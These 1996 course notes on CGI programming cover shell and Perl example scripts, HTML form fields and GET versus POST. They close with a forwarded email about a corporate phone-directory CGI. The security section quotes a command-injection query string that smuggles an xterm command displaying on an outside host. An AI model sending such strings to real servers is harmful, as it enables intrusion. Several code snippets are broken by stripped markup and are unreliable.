CGI PROGRAMMING Dennis Shasha (with thanks to Sid Bytheway for some great examples) fall 1996 Directory with my cgi scripts: You will be able to set up your own cgi scripts in your directories as follows. cd chmod a+x . mkdir public_html chmod og+r public_html --- may not be necessary cd public_html mkdir cgi-bin chmod og+r cgi-bin --- may not be necessary cd cgi-bin Now, put your cgi-bin scripts in that cgi-bin directory. Make them executable using chmod +x. Invoke them as follows. Start netscape and open the location: http://acf5.nyu.edu/cgi-bin/cgiwrap/~foo/bar e.g. netscape http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2 netscape http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2?hello netscape http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2?hello world ------stuff on my machine; IGNORE THIS. These are links cd /shasha.d/dqg0151/local/httpd/cgi-bin/dennis how to invoke a perl script foo.pl there netscape http://shasha.cs.nyu.edu:8080/cgi-bin/dennis/form7.pl --------end of stuff on my machine good teaching material: http://ute.usi.utah.edu/bin/cgi-programming/counter.pl/cgi-programming/index.html http://www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/fill-out-forms/overview.html Good book (not in your notes): CGI Programming in C & Perl by Thomas Boutell. ISBN 0-201-42219-0 ================================= Simplest possible cgi program (content type is what kind of thing to return and must be followed by a blank line, hence the second echo) #!/bin/sh DATE=/bin/date echo Content-type: text/plain echo if [ -x $DATE ]; then $DATE else echo Cannot find date command on this system. fi ================================= Above program is called date and can be invoked by http://acf5.nyu.edu/cgi-bin/cgiwrap/~des1/date2 Limitations: this is one way communication. I want to pass parameters to my program. Output is ugly. Information passed has the following properties: spaces are converted to plus signs. You can send ascii numbers by preceding them by a % sign, e.g. %2B. ================================= Second program (date2) This one prints out what is sent in as part of the address http://satchmo.cs.nyu.edu:8080/cgi-bin/date2/env.sh?hello+there (Must make it globally readable and executable using e.g. chmod 755 filename) (If you replace the + sign with a blank, the last part is not included.) #!/bin/sh DATE=/bin/date echo Content-type: text/plain echo echo "query string is $QUERY_STRING" if [ -x $DATE ]; then $DATE else echo Cannot find date command on this system. fi ================================= Third program (date3) has other important variables that you might get information about (though they might not be filled in automatically): #!/bin/sh DATE=/bin/date echo Content-type: text/plain echo echo "query string is $QUERY_STRING" echo "Here are other variables: " echo "REQUEST_METHOD (get or post) is $REQUST_METHOD" echo "CONTENT_TYPE (for html forms) is $CONTENT_TYPE" echo "CONTENT_LENGTH (for html forms) is $CONTENT_LENGTH" echo "REMOTE_HOST (so you can find out stuff) is $REMOTE_HOST" echo "REMOTE_IP (so you can find out stuff) is $REMOTE_IP" echo "REMOTE_USER (so you can find out stuff) is $REMOTE_USER" echo "SERVER_NAME (where your script is running) is $SERVER_NAME" echo "SERVER_PORT (where your script is running) is $SERVER_PORT" echo "SCRIPT_NAME (path to your script) is $SCRIPT_NAME" if [ -x $DATE ]; then $DATE else echo Cannot find date command on this system. fi ================================= Here is output of that: query string is hello Here are other variables: REQUEST_METHOD (get or post) is CONTENT_TYPE (for html forms) is CONTENT_LENGTH (for html forms) is REMOTE_HOST (so you can find out stuff) is dial4-3-async-16.dial.net.nyu.edu REMOTE_IP (so you can find out stuff) is REMOTE_USER (so you can find out stuff) is SERVER_NAME (where your script is running) is satchmo.cs.nyu.edu SERVER_PORT (where your script is running) is 8080 SCRIPT_NAME (path to your script) is /cgi-bin/date3 Fri Jun 21 04:51:03 EDT 1996 ================================= Limitation: This is still ugly. Let's write a little perl program that at least makes this nice by using html (date4.pl) http://satchmo.cs.nyu.edu:8080/cgi-bin/date4.pl/env.sh?hello+there+first+perl #!/usr/local/bin/perl #Other systems would use #!/usr/bin/perl print "Content-type: text/html\n\n"; #The following prints out until the string EOF print < Hi there!

My First Perl/HTML file

EOF ================================= You can see how to write a program that counts the number of accesses to a document. You are to write a variant that sends out a joke of the day depending on the count number. http://ute.usi.utah.edu/bin/cgi-programming/showsrc/counter.pl ================================= Security is a MAJOR issue, which is why NYU administration is reluctant to give access to cgi-bin stuff. http://ute.usi.utah.edu/bin/cgi-programming/counter.pl/cgi-programming/security.html The basic problem is that the hacker may be able to put command line strings in the stuff he sends. Example: grep $search_string /my/file And the user's query string looked like: "x+/dev/null;+xterm+-display+myhost.utah.edu+&;+/bin/false" The user would have successfully kicked off an xterm on your machine, running as the userid of your HTTP server. In development, a common bug is to have insufficient permissions on files you are accessing. Perl may fail silently if the file it wants to write is unavailable. ================================= POSTING INSTEAD OF GETTING The form output can be returned to your program by one of two methods. The GET method returns the form data to your program in the query string. The POST method, returns the form data to your CGI program on the "standard input". Generally the POST method is prefered for forms, especially when the form returns a large amount of data. This is because the URL length of many browsers is limited. It is also convienient, at times, to put other information in the query string of the URL. You already know how to use the QUERY_STRING environment variable to retrieve query information. When using the POST method to return form data to your CGI program, the http server places the data on the standard input of your program. The http server is not required to send your program an end-of-file indicator, nor is it required to place a carriage return on the data. So, be careful. Here is the source for this new method: http://ute.usi.utah.edu/bin/cgi-forms/counter.pl/cgi-forms/intro.html This uses what are called html forms. Forms are NOT more secure than QUERY_STRING based programs. Please use the same precautions. ================================= NUTS AND BOLTS OF FORM POSTING The
HTML Directive. The HTML directive indicates the begining of an HTML form. The form definition should be followed by a
HTML directive. An HTML document may contain one or more HTML forms. The sub elements of the
directive are: ACTION="/bin/script" Defines the URL of the CGI program that will process the output of the form. The default is the current URL (so if the form is generated by the CGI program that will process it, this element can be left off.) METHOD="GET|POST" Defines the method by which the CGI Program will get the output from the form. The GET method places the form output on the URL in the query string. The POST method places the output on the stdin of the CGI program and sets the CONTENT_LENGTH variable to the length of the data. The directive defines an input field. It may take on a number of characteristics, as defined by the type, size, and maxlength options. TYPE="type" Defines the type of input field. There are six types of input fields. They are: TEXT A Text field that accepts character data. PASSWORD A Text field that accepts character data, however the input data is not displayed. CHECKBOX A field that is either "on" or "off". RADIO A selectable field. Only one of all similairly named radio buttons can be "on", the others are automatically turned off. HIDDEN Displays nothing on the screen, but when the form is returned the value of the hidden field is also returned. SUBMIT A clickable button that sends the form to the URL defined in the ACTION option of the directive. RESET A clickable button that causes the browser to reset the form fields to their default values. NAME="name" Defines the variable name that is to be associated with the value of the input field. SIZE=num Defines the width in characters of the input field. This option is valid only with the TEXT and PASSWORD input fields. MAXLENGTH=num Defines the maximum number of characters that the input field will allow to be input. This option is valid only with the TEXT and PASSWORD input fields. CHECKED Specifies that this field should be selected or checked by default. This option is valid only with the CHECKBOX and RADIO input fields. VALUE="value" This option is used differently depending on the TYPE of the field. The uses are as follows: For TYPE=TEXT and TYPE=PASSWORD fields Defines the default input text. For TYPE=CHECKBOX and TYPE=RADIO fields Defines the value that is to be returned when the field is checked or selected. For TYPE=HIDDEN fields Defines the value to be returned with this field. For TYPE=SUBMIT and TYPE=RESET fields Defines the text that is to be displayed in the button. The default text is "submit" and "reset". The directive will be included as "default text" in the input area. The options are: NAME="name" Defines the variable name that is to be associated with the text in the input area. ROWS=num Defines the width in characters of the input area. COLS=num Defines the heigth in characters of the input area. The and directives. Multiple
EOF ================================= form5process.pl #!/usr/local/bin/perl #Other systems would use #!/usr/bin/perl print "Content-type: text/html\n\n"; #The following prints out until the string EOF print < Hi there!

I don't want to do anything

EOF ================================= HERE IS A MORE COMPLEX FORM, FOR QUERIES form6.pl: #!/usr/local/bin/perl #Other systems would use #!/usr/bin/perl print "Content-type: text/html\n\n"; #The following prints out until the string EOF print < Hi there! #first form as before

textfield:

#now for a check box

Check box1 check1
Check box2 check2
Check box3 check3

#now for a radio button

Radio1 rad1
Radio2 rad2
Radio3 rad3

#now for a hidden field

#now for a selection

#now for the submit part

EOF ================================= RESPONSE FORM form6process.pl This uses variables submitted. #!/usr/local/bin/perl #Other systems would use #!/usr/bin/perl # # Check for form data. # --------------------- if( !defined($ENV{'CONTENT_LENGTH'}) || $ENV{'CONTENT_LENGTH'} <= 0 ) { mydie( "No form data was sent." ); } # -------------------------------------------------- $form_data = ""; $to_read = $ENV{'CONTENT_LENGTH'}; if(($red = sysread( STDIN, $form_data, $to_read )) != $to_read ) { mydie( "Only read $red from you, but I was supposed to get $to_read" ); } # # Start the HTML document. # -------------------------------------------- print <<"EOF"; Content-type: text/html Name/Value Pairs

Name/Value Pairs

Here was all of the form data:

  • ENV{"$form_data"}

The Following name/value pairs were received from your form.


EOF

#
#  Split out and print the name/value pairs.
# --------------------------------------------
@name_value_pairs = split( /&/, $form_data );
foreach $pair ( @name_value_pairs ) {
    ($name,$value) = split( /=/, $pair );

    # de-code the URL encoding
    $value =~ s/\`|\"|\'|\;|\|//g;
    #$value = `../../support/unescape "$value"`;
    # We don't seem to have this command (that puts quotes around
    # all special shell variables.

    # change HTML special characters
    $value =~ s/&/&\;/g;
    $value =~ s//>\;/g;
    printf( "%10s = %s\n", $name, $value );

}
exit(0);



#  mydie
#  Die with an HTML msg.
#
sub mydie {
    local($msg) = @_;

    print "Content-type: text/html\n\n";
    print "$msg\n\n";
    exit(1);
}

print "Content-type: text/html\n\n";
#The following prints out until the string EOF
print <
Hi there!

EOF ================================= We now show the behavior of the second Unix homework. form7.pl and formprocess7.pl From shasha@ny.ubs.com Tue Oct 29 13:18 EST 1996 Return-Path: Received: from cs.NYU.EDU by shasha.cs.nyu.edu (SMI-8.6/1.20) id NAA27876; Tue, 29 Oct 1996 13:18:04 -0500 Received: from venus.ubs.com by cs.NYU.EDU (4.1/1.34) id AA00294; Tue, 29 Oct 96 13:20:38 EST Received: by venus.ubs.com; id SAA01559; Tue, 29 Oct 1996 18:21:05 +0100 (MET) Received: from unknown(161.239.3.21) by venus.ubs.com via smap (V3.1.1) id xma001543; Tue, 29 Oct 96 18:20:51 +0100 Received: from indecent.ny.ubs.com (indecent.ny.ubs.com [161.239.153.35]) by ns1.ny.ubs.com (8.7.3/8.7.3) with ESMTP id MAA10973 for ; Tue, 29 Oct 1996 12:51:53 -0500 (EST) Received: (from shasha@localhost) by indecent.ny.ubs.com (8.7.3/8.7.3) id MAA03631 for shasha@cs.nyu.edu; Tue, 29 Oct 1996 12:51:51 -0500 (EST) From: shasha@ny.ubs.com Date: Tue, 29 Oct 1996 12:51:51 -0500 (EST) Message-Id: <199610291751.MAA03631@indecent.ny.ubs.com> To: shasha@cs.NYU.EDU Subject: cgi info Content-Type: text Content-Length: 4164 Status: R From rct@ny.ubs.com Fri Oct 25 18:06:25 1996 Received: from ns1.ny.ubs.com (ns1.ny.ubs.com [161.239.3.21]) by indecent.ny.ubs.com (8.7.3/8.7.3) with ESMTP id SAA10226 for ; Fri, 25 Oct 1996 18:06:25 -0400 (EDT) Received: from ikura.ny.ubs.com (ikura.ny.ubs.com [161.239.150.101]) by ns1.ny.ubs.com (8.7.3/8.7.3) with ESMTP id SAA04939; Fri, 25 Oct 1996 18:06:19 -0400 (EDT) Received: (from rct@localhost) by ikura.ny.ubs.com (8.7.3/8.7.3) id SAA10635; Fri, 25 Oct 1996 18:06:18 -0400 (EDT) Message-Id: <199610252206.SAA10635@ikura.ny.ubs.com> From: rct@ny.ubs.com (Robert C. Terzi) Date: Fri, 25 Oct 1996 18:06:18 -0400 In-Reply-To: "Daniel F. Fisher" "URL on query response page" (Oct 25, 2:52pm) Reply-To: rct@ny.ubs.com X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: "Daniel F. Fisher" , phone-app@ny.ubs.com, webmaster@ny.ubs.com, nyrdt@ny.ubs.com, nywdh@ny.ubs.com, nnyorh@ny.ubs.com, shasha@ny.ubs.com Subject: Re: URL on query response page Status: R Warning: I was pretty fried when I read this. After reading it several times, I think I understand what you are asking. What I think you are asking is how HTTP->CGI passes parameters and what the query language for the phone book is: [ note: This response should probably be filed some place, like an FAQ. ] - It is possible to do HTTP->CGI transactions via two different methods: GET and POST. For the GET Method, the parameters are part of the URL: http://foo/cgi-bin/query?name=foo&other=bar&baz=42 For the POST method, the parameters are sent as a mime-attachment. GETs are convenient because any place the you can put a URL you can use a "stored query". When formatting data for output in web pages, you can "print" them as a URL that causes a query to be done which allows some "modularity" POSTs are good because they encapsulate the data well and can deal with long parameter lists. Many CGI library's can deal with BOTH GETs and POSTs, which is important for maximum flexibility. - The phone application uses both GETs and POSTs, depending upon what it is doing. For form based stuff it uses POSTs For hyperlinks it uses POSTS. - The old base URL is: http://phone.ny.ubs.com/cgi-bin/wdb/phonebook/users/query - I've been working on a cleaner interface to the phone cgi that would deal with GETs/POSTs better: http://phone.ny.ubs.com/phone2.cgi - To make queries against the directory in your web pages: Use either the old or new URL and a parameter list like: http://phone.ny.ubs.com/phone2.cgi?field=value&field2=value2 http://phone.ny.ubs.com/cgi-bin/wdb/phonebook/users/query?field=value Here are some example queries, I will list just the ?parameter list: ?name=fisher List all people who have fisher in their name. ?floor==9 List all people who are on the 9th floor. Note this is an exact match, so people on 19, 29, etc. won't be listed. ?unit1=opte List people in the division OPTE. ?unit1=opte&floor==9 List people in the division OPTE on the 9th Floor. ?unit1=opte&floor!=9 List peole in division OPTE who are NOT on the 9th floor. ?unit1=opte&floor!=9&loc=n299 List people in OPTE, who aren't on the 9th but are located in 299 ?unit2=itsu List people in the unit ITSU ?phone=6185 List people whose phone numbers contain 6185. - Note this works with other CGI things as well, this one is particularly nice, here's how you can do yahoo people look ups in your pages: http://email.yahoo.com/cgi-bin/Four11?YahooPhoneResults&f=daniel&l=fisher&s=ny - Got a Phone Number to display? Print the phone number as a URL and you can do lookups: http://email.yahoo.com/cgi-bin/Four11?YahooPhoneResults&p=2125551212&y=z --Robert >> In "URL on query response page", Oct 25, "Daniel F. Fisher" writes << > This now says > > > > So i cannot easily give people a URL that repeats a particular > query. > > Didn't it used to? > > How would I? >> End of "Daniel F. Fisher"'s message <<